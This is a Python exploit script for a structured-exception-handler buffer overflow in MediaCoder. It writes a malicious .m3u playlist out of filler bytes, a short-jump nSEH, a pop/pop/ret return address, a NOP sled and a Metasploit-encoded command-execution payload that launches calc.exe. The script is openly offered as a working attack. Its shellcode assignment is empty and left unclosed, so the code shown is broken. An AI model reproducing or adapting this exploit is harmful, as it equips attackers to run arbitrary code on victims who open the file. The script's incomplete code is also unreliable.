#!/usr/bin/env python
# Mediacoder "Universal" SEH Buffer Overflow Exploit
# Coded By: Dr_IDE
# Found By: abhishek lyall
# Usage:Load the evil .m3u file and click on it.
# Tested On:Windows XPSP3
# windows/exec - 534 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
code = (
nseh = ("\xEB\x06\xFF\xFF")
retn = ("\xC0\x57\x01\x66") #"Universal" P/P/R libconv-2.dll
nops = ("\x90" * 12)
buff = ("\x41" * 764)
junk = ("\x44" * (2000-len(buff+nseh+retn+nops+code)))
file = open('dr_ide_SEH.m3u' , 'w')
file.write(buff + nseh + retn + nops + code + junk)